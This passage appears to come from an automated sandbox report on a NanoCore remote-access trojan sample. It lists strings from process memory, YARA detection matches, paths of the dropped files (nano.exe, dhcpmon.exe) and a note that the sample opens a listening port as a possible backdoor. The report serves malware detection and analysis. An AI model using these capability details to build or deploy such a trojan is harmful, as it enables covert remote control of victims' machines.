yncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: nano.exe, 00000002.00000002.552500603.00000000032A1000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: nano.exe, 00000002.00000002.552500603.00000000032A1000.00000004.00000001.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: nano.exe, 00000002.00000002.555253844.0000000005C40000.00000004.00020000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: nano.exe, 00000002.00000002.553881083.00000000042DB000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: nano.exe, 00000002.00000002.553881083.00000000042DB000.00000004.00000001.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: 4Y85lSOUJ0.exe String found in binary or memory: NanoCore.ClientPluginHost
Source: dhcpmon.exe.2.dr String found in binary or memory: NanoCore.ClientPluginHost
Source: nano.exe.0.dr String found in binary or memory: NanoCore.ClientPluginHost
Yara detected Nanocore RAT
Source: Yara match File source: 4Y85lSOUJ0.exe, type: SAMPLE
Source: Yara match File source: 2.0.nano.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.nano.exe.a80000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.nano.exe.5c40000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.4Y85lSOUJ0.exe.69c870.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.nano.exe.5c40000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.nano.exe.42ee67c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4Y85lSOUJ0.exe.69c870.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.nano.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.nano.exe.42f2ca5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4Y85lSOUJ0.exe.3de4268.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4Y85lSOUJ0.exe.69c870.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4Y85lSOUJ0.exe.3de4268.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.nano.exe.42e9846.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.nano.exe.5c44629.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.nano.exe.42ee67c.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.nano.exe.a80000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.4Y85lSOUJ0.exe.69c870.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.nano.exe.a80000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.283905085.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.283285603.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.287642993.0000000003DE4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.283614922.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.555253844.0000000005C40000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.553881083.00000000042DB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.282943204.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.549792626.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.286708512.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 4Y85lSOUJ0.exe PID: 6896, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: nano.exe PID: 6968, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\nano.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\ProgramData\nano.exe Code function: 2_2_054D29FA bind, 2_2_054D29FA
Source: C:\ProgramData\nano.exe Code function: 2_2_054D29D7 bind, 2_2_054D29D7